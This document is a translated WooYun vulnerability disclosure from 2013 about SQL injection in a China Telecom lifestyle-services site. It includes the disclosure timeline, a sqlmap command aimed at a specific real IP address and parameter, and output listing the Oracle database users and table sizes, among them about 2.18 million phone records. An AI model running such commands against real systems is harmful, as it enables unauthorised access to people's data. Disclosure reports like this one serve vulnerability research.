WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
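2013-08-12: Details reported to the vendor; awaiting vendor handling
2013-08-16: Vendor confirmed; details disclosed to the vendor only
2013-08-26: Details disclosed to core white hats and experts in related fields
2013-09-05: Details disclosed to regular white hats
2013-09-15: Details disclosed to intern white hats
2013-09-26: Details disclosed to the public
SQL injection in a China Telecom information service system exposes more than two million records
Site
http://116.228.55.5/114Ad/introduce.aspx
This is a lifestyle-services website! It holds a large amount of user data and merchant data. Injection point: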
sqlmap.py -u "http://116.228.55.5/114Ad/articledetail.aspx?id=315" --current-db --current-user
The database is Oracle.
system users
database management system users [24]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HAOBAIAD
[*] HAOBAIDB
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
45 tables
Database: HAOBAIAD
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| CELLPHONESORT           | 2179456 |
| AD_ISUSERFIRSTVISIT     | 545611  |
| AD_ISUSERFIRSTVISIT_BAK | 477841  |
| ADMSENSE_REPORT         | 80182   |
| ADSESSIONLOG            | 67568   |
| AD_PROVINCE             | 47861   |
| ADINTERFACESTATE        | 26363   |
| ADMERCHANTS             | 8995    |
| ADMTOP_EXTEND           | 8377    |
| ADMTOP                  | 8376    |
| ADMRANK_REPORT          | 6893    |
| ADMANAGEOPERATELOG      | 3492    |
| GEOGRAPHY               | 2800    |
| ADMSENSEKEYWORD         | 1002    |
| ADMSENSEGROUP_EXTEND    | 813     |
| ADMANAGE                | 761     |
| ADMSENSEGROUP           | 711     |
| ADMANAGEBALANCELOG      | 576     |
| ADMANAGELOGINLOG        | 554     |
| ADLOG                   | 441     |
| ADARTICLE               | 321     |
| ADGROUPROLE             | 207     |
| ADMERCHANTS_WEBSITE     | 62      |
| ADPAGESYSTEM            | 43      |
| ADORDER                 | 37      |
| CC_AD_CATEGORY          | 17      |
| ADGROUP                 | 16      |
| ADGROUPPOWER            | 16      |
| ADMANAGEUSERS           | 15      |
| ADCHANNELINFO           | 10      |
| ADCHANNELINFO_EXTEND    | 8       |
| ADCHUSER                | 7       |
| ADMANAGEMERCHANTLOG     | 5       |
| ADCOMPANYINFO           | 4       |
| AD_RETENTIONKEYWORD     | 3       |
| ADCOMPANYUSER           | 3       |
| ADMRANK                 | 3       |
| ADEMAIL                 | 2       |
| ADMSENSE_CONFIG         | 2       |
+-------------------------+---------+
| CELLPHONESORT | 2179456 |!!!
I did not dig any further; the screenshots are just proof!
Severity: High
Vulnerability Rank: 14
Confirmed: 2013-08-16 23:22
None yet